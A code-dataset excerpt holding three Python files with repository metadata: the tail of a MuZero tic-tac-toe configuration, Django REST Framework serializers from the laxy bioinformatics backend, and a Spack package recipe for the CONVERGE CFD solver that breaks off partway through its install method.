self.root_exploration_fraction = 0.25
# UCB formula
self.pb_c_base = 19652
self.pb_c_init = 1.25
### Network
self.network = "resnet" # "resnet" / "fullyconnected"
self.support_size = 10 # Value and reward are scaled (with almost sqrt) and encoded on a vector with a range of -support_size to support_size. Choose it so that support_size <= sqrt(max(abs(discounted reward)))
# Residual Network
self.downsample = False # Downsample observations before representation network, False / "CNN" (lighter) / "resnet" (See paper appendix Network Architecture)
self.blocks = 2 # Number of blocks in the ResNet
self.channels = 16 # Number of channels in the ResNet
self.reduced_channels_reward = 16 # Number of channels in reward head
self.reduced_channels_value = 16 # Number of channels in value head
self.reduced_channels_policy = 16 # Number of channels in policy head
self.resnet_fc_reward_layers = [8] # Define the hidden layers in the reward head of the dynamic network
self.resnet_fc_value_layers = [8] # Define the hidden layers in the value head of the prediction network
self.resnet_fc_policy_layers = [8] # Define the hidden layers in the policy head of the prediction network
# Fully Connected Network
self.encoding_size = 32
self.fc_representation_layers = [] # Define the hidden layers in the representation network
self.fc_dynamics_layers = [16] # Define the hidden layers in the dynamics network
self.fc_reward_layers = [16] # Define the hidden layers in the reward network
self.fc_value_layers = [] # Define the hidden layers in the value network
self.fc_policy_layers = [] # Define the hidden layers in the policy network
### Training
self.results_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../results", os.path.basename(__file__)[:-3], datetime.datetime.now().strftime("%Y-%m-%d--%H-%M-%S")) # Path to store the model weights and TensorBoard logs
self.save_model = True # Save the checkpoint in results_path as model.checkpoint
self.training_steps = 1000000 # Total number of training steps (ie weights update according to a batch)
self.batch_size = 64 # Number of parts of games to train on at each training step
self.checkpoint_interval = 10 # Number of training steps before using the model for self-playing
self.logging_interval = int(1e1)
self.value_loss_weight = 0.25 # Scale the value loss to avoid overfitting of the value function, paper recommends 0.25 (See paper appendix Reanalyze)
self.train_on_gpu = torch.cuda.is_available() # Train on GPU if available
self.optimizer = "Adam" # "Adam" or "SGD". Paper uses SGD
self.weight_decay = 1e-4 # L2 weights regularization
self.momentum = 0.9 # Used only if optimizer is SGD
# Exponential learning rate schedule
self.lr_init = 0.003 # Initial learning rate
self.lr_decay_rate = 1 # Set it to 1 to use a constant learning rate
self.lr_decay_steps = 10000
### Replay Buffer
self.replay_buffer_size = 3000 # Number of self-play games to keep in the replay buffer
self.num_unroll_steps = 20 # Number of game moves to keep for every batch element
self.td_steps = 20 # Number of steps in the future to take into account for calculating the target value
self.PER = True # Prioritized Replay (See paper appendix Training), select in priority the elements in the replay buffer which are unexpected for the network
self.PER_alpha = 0.5 # How much prioritization is used, 0 corresponding to the uniform case, paper suggests 1
# Reanalyze (See paper appendix Reanalyse)
self.use_last_model_value = True # Use the last model to provide a fresher, stable n-step value (See paper appendix Reanalyze)
self.reanalyse_on_gpu = False
### Adjust the self play / training ratio to avoid over/underfitting
self.self_play_delay = 0 # Number of seconds to wait after each played game
self.training_delay = 0 # Number of seconds to wait after each training step
self.ratio = None # Desired training steps per self played step ratio. Equivalent to a synchronous version, training can take much longer. Set it to None to disable it
def visit_softmax_temperature_fn(self, trained_steps):
"""
Parameter to alter the visit count distribution to ensure that the action selection becomes greedier as training progresses.
The smaller it is, the more likely the best action (ie with the highest visit count) is chosen.
Returns:
Positive float.
"""
return 1
class Game(AbstractGame):
"""
Game wrapper.
"""
def __init__(self, seed=None):
self.env = Spiel()
def step(self, action):
"""
Apply action to the game.
Args:
action : action of the action_space to take.
Returns:
The new observation, the reward and a boolean if the game has ended.
"""
observation, reward, done = self.env.step(action)
return observation, reward * 20, done
def to_play(self):
"""
Return the current player.
Returns:
The current player, it should be an element of the players list in the config.
"""
return self.env.to_play()
def legal_actions(self):
"""
Should return the legal actions at each turn, if it is not available, it can return
the whole action space. At each turn, the game have to be able to handle one of returned actions.
For complex game where calculating legal moves is too long, the idea is to define the legal actions
equal to the action space but to return a negative reward if the action is illegal.
Returns:
An array of integers, subset of the action space.
"""
return self.env.legal_actions()
def reset(self):
"""
Reset the game for a new game.
Returns:
Initial observation of the game.
"""
return self.env.reset()
def render(self):
"""
Display the game observation.
"""
self.env.render()
input("Press enter to take a step ")
def legal_actions_human(self):
return self.env.human_legal_actions()
def human_to_action(self):
"""
For multiplayer games, ask the user for a legal action
and return the corresponding action number.
Returns:
An integer from the action space.
"""
while True:
try:
print("Legal Actions: ", self.legal_actions_human())
choice = input("Enter your move: ")
if (choice in self.legal_actions_human()):
break
except:
pass
print("Wrong input, try again")
return self.env.board.string_to_action(choice)
def action_to_string(self, action_number):
"""
Convert an action number to a string representing the action.
Args:
action_number: an integer from the action space.
Returns:
String representing the action.
"""
row = action_number // 3 + 1
col = action_number % 3 + 1
return f"Play row {row}, column {col}"
class Spiel:
def __init__(self):
self.game = game
self.board = self.game.new_initial_state()
self.player = 1
def to_play(self):
return 0 if self.player == 1 else 1
def reset(self):
self.board = self.game.new_initial_state()
self.player = 1
return self.get_observation()
def step(self, action):
self.board = self.board.child(action)
done = self.board.is_terminal()
reward = 1 if self.have_winner() else 0
observation = self.get_observation()
self.player *= -1
return observation, reward, done
def get_observation(self):
if self.player == 1:
current_player = 1
else:
current_player = 0
return numpy.array(self.board.observation_tensor(current_player)).reshape(self.game.observation_tensor_shape())
def legal_actions(self):
return self.board.legal_actions()
def have_winner(self):
rewards = self.board.rewards()
if (self.player == 1):
if (rewards[0] == 1.0):
return True
elif (self.player == -1):
if (rewards[1] == 1.0):
return True
return False
def human_legal_actions(self):
return [self.board.action_to_string(x) for x in self.board.legal_actions()]
def render(self):
print(self.board)
| 40.302721
| 244
| 0.657693
|
469cf1e494198570402e1698fdafacc011861f9f
| 25,476
|
py
|
Python
|
laxy_backend/serializers.py
|
MonashBioinformaticsPlatform/laxy
|
fa9cfc3d9b2738ec0b9f471ddf4a4235cb6eb594
|
[
"Apache-2.0"
] | 1
|
2020-11-19T15:10:42.000Z
|
2020-11-19T15:10:42.000Z
|
laxy_backend/serializers.py
|
MonashBioinformaticsPlatform/laxy
|
fa9cfc3d9b2738ec0b9f471ddf4a4235cb6eb594
|
[
"Apache-2.0"
] | 177
|
2018-10-28T23:01:24.000Z
|
2022-02-26T06:35:29.000Z
|
laxy_backend/serializers.py
|
MonashBioinformaticsPlatform/laxy
|
fa9cfc3d9b2738ec0b9f471ddf4a4235cb6eb594
|
[
"Apache-2.0"
] | 2
|
2019-03-14T10:06:19.000Z
|
2020-08-24T19:41:28.000Z
|
import json
from collections import OrderedDict
from django.contrib.contenttypes.models import ContentType
from pathlib import Path
from urllib.parse import urlparse
import pydash
from django.db import transaction
from rest_framework import serializers
from django.core.validators import URLValidator
from rest_framework import status
from rest_framework.exceptions import ValidationError, PermissionDenied
from rest_framework.fields import CurrentUserDefault
from typing import Sequence
from drf_openapi.entities import VersionedSerializers
from http.client import responses as response_code_messages
from laxy_backend.models import SampleCart, PipelineRun, File, FileSet
from laxy_backend.util import unique, is_valid_laxy_sftp_url
from . import models
import logging
logger = logging.getLogger(__name__)
default_status_codes = (400, 401, 403, 404)
def status_codes(*codes):
if not codes:
codes = default_status_codes
return dict([(c, response_code_messages[c]) for c in codes])
# TODO: Swagger docs (drf_openapi) lists JSONField type as string.
# So we use our this class to serialize arbitrary JSON instead.
# It appears as the the correct field type in the docs.
# Maybe drf_openapi needs a fix ?
class SchemalessJsonResponseSerializer(serializers.Serializer):
"""
We use this serializer anywhere we want to accept a schemaless blob of JSON.
"""
def create(self, validated_data):
return validated_data
def update(self, instance, validated_data):
instance = validated_data
return instance
def to_internal_value(self, data):
if isinstance(data, str):
data = json.loads(data, object_pairs_hook=OrderedDict)
data = OrderedDict(data)
if json.loads(json.dumps(data), object_pairs_hook=OrderedDict) != data:
msg = "Invalid JSON, round-trip serialization failed"
raise ValidationError(msg)
return data
def to_representation(self, obj):
return obj
class BaseModelSerializer(serializers.ModelSerializer):
class Meta:
fields = "__all__"
read_only_fields = ("id",)
def uuid(self, obj):
if hasattr(obj, "uuid"):
return obj.uuid()
else:
return obj.id
def _set_owner(self, obj):
"""
Set the owner (User) of the model instance (`obj`), based
on the user making the request.
"""
if self.context:
user = self.context.get("request").user
if user and hasattr(obj, "owner"):
obj.owner = user
return obj
def create(self, validated_data):
obj = self.Meta.model.objects.create(**validated_data)
# If the request is provided as part of the context
# passed to the serializer, assign it as the owner
# of the model
obj = self._set_owner(obj)
obj.save()
return obj
def _update_attrs(self, instance, validated_data):
"""
Updates the non-readonly attributes on a model instance with
the given validated_data (dictionary) values.
:param instance: The model instance to update
:type instance: django.db.models.Model
:param validated_data: The new data that will replace attribute
values in instance.
:type validated_data: dict
:return: The updated model instance.
:rtype: django.db.models.Model
"""
for k, v in validated_data.items():
if k not in getattr(self.Meta, "read_only_fields", []):
setattr(instance, k, v)
return instance
class PatchSerializerResponse(serializers.Serializer):
"""
A generic PATCH response serializer, which should generally be 204 status
code on success with no response body. This primarily exists to present
the correct status codes in the drf_openapi Swagger docs.
"""
class Meta:
fields = ()
read_only_fields = ("id",)
error_status_codes = status_codes(*default_status_codes, 204)
class PutSerializerResponse(serializers.Serializer):
"""
A generic PUT response serializer, which should generally be 204 status
code on success with no response body. This primarily exists to present
the correct status codes in the drf_openapi Swagger docs.
"""
class Meta:
fields = ()
read_only_fields = ("id",)
error_status_codes = status_codes(*default_status_codes, 204)
class SystemStatusSerializer(BaseModelSerializer):
class Meta:
model = models.SystemStatus
fields = (
"status",
"message",
"long_message",
"link_url",
"start_time",
"end_time",
)
class PingResponseSerializer(serializers.Serializer):
system_status = SystemStatusSerializer(
required=False, read_only=True, allow_null=True
)
version = serializers.CharField(max_length=255, required=False)
env = serializers.CharField(max_length=255, required=False)
class FileSerializer(BaseModelSerializer):
name = serializers.CharField(max_length=255, required=False)
path = serializers.CharField(max_length=4096, required=False)
location = serializers.CharField(
max_length=2048, validators=[models.URIValidator()]
)
fileset = serializers.PrimaryKeyRelatedField(
queryset=FileSet.objects.all(), required=False
)
type_tags = serializers.ListField(default=[], required=False)
# metadata = serializers.JSONField()
metadata = SchemalessJsonResponseSerializer(
required=False
) # becomes OpenAPI 'object' type
class Meta:
model = models.File
fields = (
"id",
"owner",
"name",
"path",
"location",
"checksum",
"fileset",
"type_tags",
"deleted",
"metadata",
)
read_only_fields = (
"id",
"owner",
)
error_status_codes = status_codes()
def create(self, validated_data):
location = validated_data.get("location", None)
scheme = urlparse(location).scheme.lower()
if scheme == "laxy+sftp" and not is_valid_laxy_sftp_url(location):
raise ValidationError(
"Invalid laxy+ftp:// URL (does ComputeResource exist ?)"
)
f = models.File.objects.create(**validated_data)
f.save()
return f
@transaction.atomic
def update(self, instance, validated_data):
instance = self._update_attrs(instance, validated_data)
for field in getattr(self.Meta.model.ExtraMeta, "patchable_fields", []):
if hasattr(instance, field):
new_value = validated_data.get(field, getattr(instance, field))
setattr(instance, field, new_value)
instance.save()
return instance
class FileSerializerPostRequest(FileSerializer):
class Meta(FileSerializer.Meta):
fields = (
"name",
"path",
"location",
"checksum",
"fileset",
"type_tags",
"metadata",
)
class FileBulkRegisterSerializer(FileSerializer):
class Meta(FileSerializer.Meta):
fields = ("name", "path", "location", "checksum", "type_tags", "metadata")
def to_internal_value(self, data):
if isinstance(data.get("type_tags", ""), str):
data["type_tags"] = data["type_tags"].replace(" ", "").split(",")
if "filepath" in data:
data["name"] = Path(data["filepath"]).name
data["path"] = str(Path(data["filepath"]).parent)
del data["filepath"]
# Trim any whitespace from ends of values
for field in self.Meta.fields:
if field in data and isinstance(data[field], str):
data[field] = data[field].strip()
if field in data and isinstance(data[field], list):
data[field] = [item.strip() for item in data[field]]
return data
# Only add type_tags, don't replace list
# def update(self, instance: File, validated_data):
# validated_data['type_tags'].extend(instance.type_tags)
# validated_data['type_tags'] = unique(validated_data['type_tags'])
# instance = self._update_attrs(instance, validated_data)
# instance.save()
# return instance
# naming is hard
class JobFileSerializerCreateRequest(FileSerializer):
location = serializers.CharField(
max_length=2048, validators=[models.URIValidator()], required=False
)
class Meta(FileSerializer.Meta):
fields = ("location", "checksum", "type_tags", "metadata")
class FileSetSerializer(BaseModelSerializer):
files = FileSerializer(many=True, required=False, allow_null=True)
# This lists only only IDs
# files = serializers.PrimaryKeyRelatedField(many=True,
# queryset=File.objects.all())
class Meta:
model = models.FileSet
fields = (
"id",
"name",
"path",
"owner",
"files",
)
read_only_fields = (
"id",
"owner",
)
depth = 0
error_status_codes = status_codes()
class FileSerializerOptionalLocation(FileSerializer):
"""
Allows the `location` field to be omitted - intended to be
used when we want to be able to refer to a list of new files
where location would be required, or a list of existing files
using `id` only.
"""
id = serializers.CharField(max_length=24, required=False)
location = serializers.CharField(
required=False,
allow_null=False,
allow_blank=False,
max_length=2048,
validators=[models.URIValidator()],
)
class FileSetSerializerPostRequest(FileSetSerializer):
class Meta(FileSetSerializer.Meta):
fields = (
"id",
"name",
"path",
"files",
)
files = FileSerializerOptionalLocation(many=True, required=False, allow_null=True)
@transaction.atomic
def create(self, validated_data):
"""
:param validated_data:
:type validated_data:
:return:
:rtype:
"""
files_data = validated_data.pop("files", [])
fset = models.FileSet.objects.create(**validated_data)
fset = self._set_owner(fset)
# We create new file objects if the `files` list has details other than
# the id set. If only the id is set, we assume it's an existing file
# and use that.
for f in files_data:
f_id = f.get("id", None)
if not f_id:
fobj = models.File.objects.create(**f)
fobj.owner = fset.owner
else:
try:
fobj = models.File.objects.get(id=f_id)
except File.DoesNotExist:
raise File.DoesNotExist(f"File {f_id} does not exist.")
if fobj.owner != fset.owner:
raise PermissionDenied(
detail="Attempt to add Files not owned by the FileSet owner disallowed."
)
fset.add(fobj)
return fset
class SampleCartSerializer(BaseModelSerializer):
# samples = serializers.JSONField(required=True)
# samples = SchemalessJsonResponseSerializer(required=True)
samples = serializers.ListField(required=True)
class Meta:
model = models.SampleCart
fields = ("id", "name", "owner", "samples")
read_only_fields = (
"id",
"owner",
)
error_status_codes = status_codes()
class ComputeResourceSerializer(BaseModelSerializer):
gateway_server = serializers.CharField(required=False, max_length=255)
class Meta:
model = models.ComputeResource
fields = "__all__"
# not actually required for id since editable=False on model
read_only_fields = ("id",)
depth = 1
error_status_codes = status_codes()
class PipelineSerializer(BaseModelSerializer):
metadata = SchemalessJsonResponseSerializer(required=False)
class Meta:
model = models.Pipeline
fields = "__all__"
depth = 0
error_status_codes = status_codes()
class JobSerializerBase(BaseModelSerializer):
owner = serializers.PrimaryKeyRelatedField(
read_only=True, default=serializers.CurrentUserDefault()
)
input_fileset_id = serializers.CharField(
source="input_files",
required=False,
allow_blank=True,
allow_null=True,
max_length=24,
)
output_fileset_id = serializers.CharField(
source="output_files",
required=False,
allow_blank=True,
allow_null=True,
max_length=24,
)
# params = serializers.JSONField(required=False)
params = SchemalessJsonResponseSerializer(
required=False
) # becomes OpenAPI 'object' type
metadata = SchemalessJsonResponseSerializer(required=False)
compute_resource = serializers.CharField(
source="compute_resource.id",
required=False,
allow_blank=True,
allow_null=True,
max_length=24,
)
class Meta:
model = models.Job
fields = "__all__"
# not actually required for id since editable=False on model
read_only_fields = ("id",)
depth = 0
error_status_codes = status_codes()
class JobSerializerResponse(JobSerializerBase):
input_fileset_id = serializers.CharField(
source="input_files.id", max_length=24, default=""
)
output_fileset_id = serializers.CharField(
source="output_files.id", max_length=24, default=""
)
# output_files = FileSerializer(many=True, required=False)
class Meta:
model = models.Job
exclude = (
"input_files",
"output_files",
)
depth = 0
error_status_codes = status_codes()
@transaction.atomic
def update(self, instance, validated_data):
instance = self._update_attrs(instance, validated_data)
for field in getattr(self.Meta.model.ExtraMeta, "patchable_fields", []):
if hasattr(instance, field):
new_value = validated_data.get(field, getattr(instance, field))
setattr(instance, field, new_value)
instance.save()
return instance
# TODO: modify this to trim down unnecessary output,
# eg, we don't need the full nested sample_cart etc
class JobListSerializerResponse(JobSerializerResponse):
latest_event = serializers.CharField(source="latest_event.event", default="")
class Meta:
model = models.Job
exclude = ("input_files", "output_files")
depth = 0
error_status_codes = status_codes()
class JobSerializerRequest(JobSerializerBase):
input_files = FileSerializer(many=True, required=False)
class Meta(JobSerializerBase.Meta):
depth = 1
@transaction.atomic
def create(self, validated_data):
"""
:param validated_data:
:type validated_data:
:return:
:rtype:
"""
input_files_data = validated_data.pop("input_files", [])
input_fileset_id = validated_data.pop("input_fileset_id", None)
# Output files can only be updated in a PATCH operation
# output_files_data = validated_data.pop('output_files', [])
compute_resource_id = validated_data.pop("compute_resource", None)
job = models.Job.objects.create(**validated_data)
job = self._set_owner(job)
if compute_resource_id:
compute = models.ComputeResource.objects.get(id=compute_resource_id)
job.compute_resource = compute
# We create new file objects if the input file in the list has
# details other than the id set. If only the id is set, we assume
# it's an existing file and use that. If an input_fileset id is provided
# we ignore anything in input_files and just use the specified FileSet.
if not input_fileset_id:
ifileset = job.input_files
if not ifileset:
ifileset = models.FileSet.objects.create(name="input", owner=job.owner)
ifileset.name = f"Input files for job: {job.id}"
for f in input_files_data:
f_id = f.get("id", None)
if not f_id:
input_file = models.File.objects.create(**f)
else:
input_file = models.File.objects.get(id=f_id)
ifileset.add(input_file)
ifileset.save()
else:
if input_files_data:
raise serializers.ValidationError(
"You should only specify an "
"input_fileset ID or a list "
"of input_files, not both."
)
ifileset = models.FileSet.objects.get(id=input_fileset_id)
job.input_files = ifileset
if not job.output_files:
job.output_files = models.FileSet.objects.create(
name=f"Output files for job: {job.id}", owner=job.owner
)
job.output_files.save()
job.save()
return job
@transaction.atomic
def update(self, instance, validated_data):
serializer = JobSerializerRequest(instance, data=validated_data, partial=True)
output_files_data = validated_data.pop("output_files", [])
# status = validated_data.get('status', instance.status)
ofiles = []
for data in output_files_data:
# We can add files by id if they exist, or create new files
# from file objects (if id is left unset).
file_id = data.get("id", None)
if file_id is None:
if "id" in data:
del data["id"]
new_file = models.File.objects.create(**data)
ofiles.append(new_file)
else:
# check the file_id actually exists before adding it
existing_file = models.File.objects.get(id=file_id)
ofiles.append(file_id)
# ofile.save()
instance.output_files.add(ofiles)
# instance.save() # instance.output_files.add saves
return serializer.save()
class PipelineRunSerializer(BaseModelSerializer):
owner = serializers.PrimaryKeyRelatedField(
read_only=True,
# default=serializers.CurrentUserDefault()
)
# job = serializers.PrimaryKeyRelatedField()
sample_cart = SampleCartSerializer()
# sample_metadata = SchemalessJsonResponseSerializer(required=False) # becomes OpenAPI 'object' type
params = SchemalessJsonResponseSerializer(
required=False
) # becomes OpenAPI 'object' type
class Meta:
model = models.PipelineRun
fields = "__all__"
read_only_fields = (
"id",
"owner",
)
depth = 1
error_status_codes = status_codes()
# TODO: Should we convert File UUIDs from the associated SampleCart into URLs here ?
class PipelineRunCreateSerializer(PipelineRunSerializer):
sample_cart = serializers.PrimaryKeyRelatedField(queryset=SampleCart.objects.all())
# input_fileset = serializers.PrimaryKeyRelatedField(queryset=FileSet.objects.all())
class Meta(PipelineRunSerializer.Meta):
depth = 0
def create(self, validated_data):
run = models.PipelineRun.objects.create(**validated_data)
self._set_owner(run)
run.save()
return run
def update(self, instance, validated_data):
# FIXME: This is not the right way to update the instance - we really should be
# doing it via the serializer (as commented out below).
# for k, v in validated_data.items():
# if k not in self.Meta.read_only_fields:
# setattr(instance, k, v)
instance = self._update_attrs(instance, validated_data)
instance.save()
return instance
# FIXME: This fails due to not validating the sample_cart primary key.
# Unclear why PrimaryKeyRelatedField isn't doing it's job
# serializer = PipelineRunCreateSerializer(instance,
# data=validated_data)
# if serializer.is_valid():
# return serializer.save()
class EventLogSerializer(BaseModelSerializer):
extra = SchemalessJsonResponseSerializer(required=False)
class Meta:
model = models.EventLog
fields = "__all__"
read_only_fields = (
"id",
"user",
)
depth = 0
error_status_codes = status_codes()
def create(self, validated_data):
obj = self.Meta.model.objects.create(**validated_data)
obj.user = self.context.get("request").user
obj.save()
return obj
class JobEventLogSerializer(EventLogSerializer):
class Meta:
model = models.EventLog
exclude = (
"user",
"timestamp",
"object_id",
"content_type",
)
read_only_fields = (
"id",
"user",
)
depth = 0
error_status_codes = status_codes()
class FileListingItem(serializers.Serializer):
name = serializers.CharField(required=True)
location = serializers.URLField(required=True)
type = serializers.CharField(required=True)
tags = serializers.ListField(default=[])
class FileListing(serializers.Serializer):
listing = FileListingItem(many=True)
class LoginRequestSerializer(serializers.Serializer):
username = serializers.CharField(required=True)
password = serializers.CharField(required=True)
class RedirectResponseSerializer(serializers.Serializer):
redirect = serializers.URLField(required=True)
status = serializers.IntegerField(required=True)
class SocialAuthLoginRequest(serializers.Serializer):
provider = serializers.CharField(required=True)
code = serializers.CharField(required=True)
clientId = serializers.CharField(required=True)
redirectUri = serializers.URLField(required=True)
class SocialAuthLoginResponse(serializers.Serializer):
id = serializers.CharField(required=True)
username = serializers.CharField(required=True)
first_name = serializers.CharField()
last_name = serializers.CharField()
email = serializers.CharField()
class UserProfileResponse(serializers.Serializer):
id = serializers.CharField(required=True)
username = serializers.CharField(required=True)
full_name = serializers.CharField()
email = serializers.CharField()
profile_pic = serializers.URLField()
# TODO: Determine if these tokens are used anywhere by clients (eg frontend / run_job.sh)
# and if not remove them from here. Out of scope for user profile and a potential
# security issue
token = serializers.CharField()
drf_token = serializers.CharField()
jwt_authorization_header_prefix = serializers.CharField()
drf_authorization_header_prefix = serializers.CharField()
class AccessTokenSerializer(BaseModelSerializer):
content_type = serializers.CharField(required=True)
object_id = serializers.CharField(required=True)
class Meta:
model = models.AccessToken
fields = "__all__"
read_only_fields = ("id", "created_by", "token")
depth = 0
error_status_codes = status_codes()
def create(self, validated_data):
target_id = validated_data["object_id"]
target_content_type = validated_data["content_type"]
target_obj = ContentType.objects.get(
app_label="laxy_backend", model=target_content_type
).get_object_for_this_type(id=target_id)
del validated_data["content_type"]
del validated_data["object_id"]
obj = self.Meta.model.objects.create(**validated_data)
obj.created_by = getattr(self.context.get("request"), "user", None)
obj.obj = target_obj
obj.save()
return obj
class JobAccessTokenRequestSerializer(AccessTokenSerializer):
class Meta(AccessTokenSerializer.Meta):
fields = (
"id",
"object_id",
"content_type",
"token",
"created_by",
"expiry_time",
"created_time",
"modified_time",
)
read_only_fields = (
"id",
"created_by",
"token",
)
object_id = serializers.CharField(required=False)
content_type = serializers.CharField(required=False)
class JobAccessTokenResponseSerializer(JobAccessTokenRequestSerializer):
class Meta(JobAccessTokenRequestSerializer.Meta):
fields = (
"id",
"object_id",
"token",
"created_by",
"expiry_time",
"created_time",
"modified_time",
)
read_only_fields = (
"id",
"object_id",
"created_by",
"token",
"object_id",
"content_type",
)
| 31.805243
| 105
| 0.627532
|
038c743436bc9587d9f628c227d391966aac0ba1
| 10,569
|
py
|
Python
|
var/spack/repos/builtin/packages/converge/package.py
|
LiamBindle/spack
|
e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2,360
|
2017-11-06T08:47:01.000Z
|
2022-03-31T14:45:33.000Z
|
var/spack/repos/builtin/packages/converge/package.py
|
LiamBindle/spack
|
e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 13,838
|
2017-11-04T07:49:45.000Z
|
2022-03-31T23:38:39.000Z
|
var/spack/repos/builtin/packages/converge/package.py
|
LiamBindle/spack
|
e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1,793
|
2017-11-04T07:45:50.000Z
|
2022-03-30T14:31:53.000Z
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import glob
import os
from spack import *
class Converge(Package):
"""CONVERGE is a revolutionary computational fluid dynamics (CFD) program
that eliminates the grid generation bottleneck from the simulation process.
CONVERGE was developed by engine simulation experts and is straightforward
to use for both engine and non-engine simulations. Unlike many CFD
programs, CONVERGE automatically generates a perfectly orthogonal,
structured grid at runtime based on simple, user-defined grid control
parameters. This grid generation method completely eliminates the need to
manually generate a grid. In addition, CONVERGE offers many other features
to expedite the setup process and to ensure that your simulations are as
computationally efficient as possible."""
homepage = "https://www.convergecfd.com/"
url = "https://download.convergecfd.com/download/CONVERGE_2.4/Full_Solver_Packages/converge_install_2.4.10.tar.gz"
# In order to view available versions, you need to register for an account:
# https://download.convergecfd.com/wp-login.php?action=register
version('2.4.10', sha256='5d3c39894598d2395149cfcc653af13b8b1091177290edd62fcf22c7e830d410')
version('2.3.23', sha256='1217d16eaf9d263f917ee468778508bad9dacb7e4397a293cfa6467f39fb4c52')
version('2.2.0', sha256='3885acbaf352c718ea69f0206c858a01be02f0928ffee738e4aceb1dd939a77a',
url="https://download.convergecfd.com/download/CONVERGE_2.2/Full_Solver_Packages/converge_install_2.2.0_042916.tar.gz")
version('2.1.0', sha256='6b8896d42cf7b9013cae5456f4dc118306a5bd271d4a15945ceb7dae913e825a',
url="https://download.convergecfd.com/download/CONVERGE_2.1/Full_Solver_Packages/converge_install_2.1.0_111615.tar.gz")
version('2.0.0', sha256='f32c4824eb33724d85e283481d67ebd0630b1406011c528d775028bb2546f34e',
url="https://download.convergecfd.com/download/CONVERGE_2.0/Full_Solver_Packages/converge_install_2.0.0_090214.tar.gz")
variant('mpi', default=True, description='Build with MPI support')
# The following MPI libraries are compatible with CONVERGE:
#
# +--------------+---------+---------+---------+---------+---------+
# | MPI Packages | v2.0 | v2.1 | v2.2 | v2.3 | v2.4 |
# +--------------+---------+---------+---------+---------+---------+
# | HP-MPI | 2.0.3+ | 2.0.3+ | 2.0.3+ | 2.0.3+ | |
# | Intel MPI | | | | | 17.0.98 |
# | MPICH | ?.?.? | ?.?.? | 1.2.1 | 3.1.4 | ?.?.? |
# | MVAPICH2 | ?.?.? | | | | |
# | Open MPI | 1.0-1.4 | 1.0-1.4 | 1.5-1.8 | 1.5-1.8 | 1.10 |
# | Platform MPI | | | 9.1.2 | 9.1.2 | 9.1.2 |
# +--------------+---------+---------+---------+---------+---------+
#
# NOTE: HP-MPI was bought out by Platform MPI
#
# These version requirements are more strict than for most packages.
# Since the tarball comes with pre-compiled executables,
# the version of libmpi.so must match exactly, or else
# you will end up with missing libraries and symbols.
depends_on('mpi', when='+mpi')
# FIXME: Concretization is currently broken, so this causes:
# $ spack spec converge
# to crash. You must explicitly state what MPI version you want:
# $ spack spec converge@2.4.10 +mpi ^openmpi@:1.10
#
# TODO: Add version ranges for other MPI libraries
depends_on('openmpi@1.10.0:1.10', when='@2.4.0:2.4+mpi^openmpi')
depends_on('openmpi@1.5:1.8', when='@2.2:2.3+mpi^openmpi')
depends_on('openmpi@:1.4', when='@:2.1+mpi^openmpi')
# TODO: Add packages for hp-mpi and platform-mpi
# conflicts('^hp-mpi', when='@2.4:')
conflicts('^intel-mpi', when='@:2.3')
conflicts('^intel-parallel-studio+mpi', when='@:2.3')
# conflicts('^platform-mpi', when='@:2.1')
conflicts('^spectrum-mpi')
# Licensing
license_required = True
license_comment = '#'
license_files = ['license/license.lic']
license_vars = ['RLM_LICENSE']
license_url = 'https://www.reprisesoftware.com/RLM_License_Administration.pdf'
def url_for_version(self, version):
url = "https://download.convergecfd.com/download/CONVERGE_{0}/Full_Solver_Packages/converge_install_{1}.tar.gz"
return url.format(version.up_to(2), version)
def install(self, spec, prefix):
# 2.0.0
# converge -> converge-2.0.0-hpmpi-090214
# converge-2.0.0-hpmpi-090214 -> libmpi.so.1, libmpio.so.1
# converge-2.0.0-mpich2-090214 -> libmpich.so.1.2
# converge-2.0.0-mvapich-090214 -> libibumad.so.1
# converge-2.0.0-openmpi-090214 -> libmpi.so.0
# converge-2.0.0-serial-090214
# make_surface
# post_convert
# 2.1.0
# converge -> converge-2.1.0-hpmpi-111615
# converge-2.1.0-hpmpi-111615 -> libmpi.so.1, libmpio.so.1
# converge-2.1.0-mpich2-111615 -> libmpich.so.1.2
# converge-2.1.0-openmpi-111615 -> libmpi.so.0
# converge-2.1.0-serial-111615
# make_surface
# post_convert
# 2.2.0
# converge -> converge-2.2.0-hpmpi-042916
# converge-2.2.0-hpmpi-042916 -> libmpi.so.1, libmpio.so.1
# converge-2.2.0-mpich2-042916
# converge-2.2.0-openmpi-042916 -> libmpi.so.1
# converge-2.2.0-pmpi-042916 -> libmpi.so.1, libmpio.so.1
# converge-2.2.0-serial-042916
# make_surface
# post_convert
# 2.3.23
# converge-2.3.23-hpmpi-linux-64 -> libmpi.so.1, libmpio.so.1
# converge-2.3.23-mpich2-linux-64 -> libmpi.so.12
# converge-2.3.23-openmpi-linux-64 -> libmpi.so.1
# converge-2.3.23-pmpi-linux-64 -> libmpi.so.1, libmpio.so.1
# converge-2.3.23-serial-linux-64
# make_surface_64
# post_convert_mpich_64 -> libmpi.so.12
# post_convert_ompi_64 -> libmpi.so.1
# post_convert_pmpi_64 -> libmpi.so.1, libmpio.so.1
# post_convert_serial_64
# 2.4.10
# converge-2.4.10-intel -> libmpi.so.12, libmpifort.so.12
# converge-2.4.10-mpich -> libmpi.so.12
# converge-2.4.10-ompi -> libmpi.so.12
# converge-2.4.10-pmpi -> libmpi.so.1, libmpio.so.1
# converge-2.4.10-serial
# make_surface_64
# post_convert_mpich_64 -> libmpi.so.12
# post_convert_ompi_64 -> libmpi.so.1
# post_convert_pmpi_64 -> libmpi.so.1
# post_convert_serial_64
# The CONVERGE tarball comes with binaries for several MPI libraries.
# Only install the binary that matches the MPI we are building with.
with working_dir('l_x86_64/bin'):
if '~mpi' in spec:
converge = glob.glob('converge-*-serial*')
post_convert = glob.glob('post_convert_serial*')
elif 'hp-mpi' in spec:
converge = glob.glob('converge-*-hpmpi*')
# No HP-MPI version of post_convert
post_convert = glob.glob('post_convert_serial*')
